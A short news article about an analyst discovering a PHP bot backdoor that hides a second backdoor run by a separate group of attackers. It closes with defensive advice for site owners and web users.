Major PHP double backdoor security flaw discovered

A huge security flaw has been discovered in PHP with two backdoors, leading some security experts to warn of the potential threat involved.

Andrew Brandt, Lead Threat Analyst at security firm Webroot, discovered the backdoor a few days ago, but to his surprise he discovered a second backdoor buried deep within the first. “Someone’s bugged this bug with another bug,” he said in an interview with DaniWeb.

When users load a website with the PHP code embedded, there is a risk of picking up a pretty nasty  Trojan. “The code is nicely appointed with such desirable features as the ability to execute shell commands on the host server, send a flood of data packets at another computer, and scan remote computers,” said Brandt.

The script is written in such a way that the PHP bot loads a number of commands written in a Perl script, which access a different control server, one which is operated by a separate set of hackers to the first. Effectively it means that a new group of hackers are using an old group’s code and distribution network to spread a totally new exploit.

“PHP can and has been used as a tool for malicious activity, just like Javascript. PHP backdoors, bots, and download code has been part of the threat landscape for some time. There are hundreds of different bots, backdoors, and other malicious server-side PHP code floating around,” said Brandt.

“But this isn’t a problem with PHP, inherently, just as Windows malware isn’t a C++ or Delphi problem. Malicious people will use whatever tools are at their disposal to engage in malicious activity. PHP happens to be a particularly powerful and useful tool, but whether one uses it for good or evil depends on the human doing the coding at the keyboard,” he continued.

Brandt said that the people at risk of this vulnerability are the owners and operators of websites using PHP, the web hosting companies keeping those websites online, and the “hapless web surfers” who visit them. He revealed that stronger password policies that require more password complexity and regular changing of passwords are essential to mitigating some of the potential disasters.

“Web surfers should protect themselves by using current, up-to-date antivirus, as well as some sort of scripting controls on their browser,” said Brandt. He also recommended a Firefox add-on called NoScript, which blocks all website scripts from running without the user’s permission, which could prevent infection from untrustworthy websites.